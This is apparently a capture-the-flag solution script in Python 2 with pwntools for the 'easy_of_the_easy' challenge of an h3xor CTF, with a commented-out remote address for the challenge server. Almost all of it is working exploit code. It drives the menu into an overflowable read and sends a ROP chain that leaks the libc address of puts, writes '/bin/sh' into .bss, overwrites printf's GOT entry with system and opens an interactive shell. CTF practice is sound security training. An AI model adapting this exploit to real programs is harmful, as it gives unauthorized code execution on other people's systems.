hOwDayS Sunrin 10720
h3xor ctf easy
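```python
# Python 2 / pwntools (uses raw_input and str payloads)
from pwn import *

p = process("./easy_of_the_easy")
#p = remote("49.236.136.140",14000)
e = ELF("./easy_of_the_easy")

pr = 0x080483f9          # pop; ret gadget (clears one argument)
pppr = 0x080489e9        # pop; pop; pop; ret gadget (clears three arguments)
bss = 0x0804a040 +100    # writable scratch space in .bss

# Menu inputs that lead to the overflowable read.
# The listing lost its indentation; the loop body is assumed to be
# the recv and the first three inputs.
for i in range(0,200):
    p.recv()
    p.sendline("1")
    p.sendline("1")
    p.sendline("0")

p.sendline("3")
p.sendline("18899")
p.sendline("13")
p.sendline("0")
p.sendline("4")
p.sendline("1")
p.sendline("1")
p.recvuntil("Good Luck!")

# Padding up to the saved return address (0x12 bytes + saved EBP)
payload = "A" * (0x12 + 4)

# Stage 1: puts(puts@got) leaks the libc address of puts
payload += p32(e.plt["puts"])
payload += p32(pr)
payload += p32(e.got["puts"])

# Stage 2: read(0, bss, 8) stores "/bin/sh\x00" in .bss
payload += p32(e.plt["read"])
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(len("/bin/sh\x00"))

# Stage 3: read(0, printf@got, 8) overwrites the GOT entry of printf
payload += p32(e.plt["read"])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got["printf"])
payload += p32(len("/bin/sh\x00"))

# Stage 4: printf@plt(bss) now resolves to system("/bin/sh")
payload += p32(e.plt["printf"])
payload += "AAAA"        # dummy return address
payload += p32(bss)

raw_input()              # pause so a debugger can be attached
p.send(payload)
#print hexdump(p.recv())

# Leaked puts address minus the offset of puts in the target libc
libc_base = u32(p.recv(4)) - 0x5fca0
log.success("Libc_base : "+hex(libc_base))

p.send("/bin/sh\x00")                # consumed by stage 2
p.send(p32(libc_base + 0x3ada0))     # system address, consumed by stage 3

p.interactive()
```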